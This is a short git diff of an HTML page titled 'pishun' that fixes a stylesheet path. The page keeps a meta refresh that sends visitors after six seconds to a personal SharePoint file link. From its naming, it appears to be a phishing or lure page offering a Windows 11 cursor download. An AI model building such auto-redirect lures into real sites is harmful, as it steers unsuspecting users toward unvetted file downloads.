--- a/w11cursor/index.html
+++ b/w11cursor/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <title>pishun</title>
-    <link rel="stylesheet" href="./css/main.css">
+    <link rel="stylesheet" href="../css/main.css">
     <meta http-equiv="refresh" content="6; url=https://push33nxx-my.sharepoint.com/:u:/g/personal/admin_pishun_xyz/Ea1rI60ASm5HuokW1Aux7SQBv_zl3M6eRyDvj-CgTenS2g?e=ZT6rGG">
 </head>
 <body>
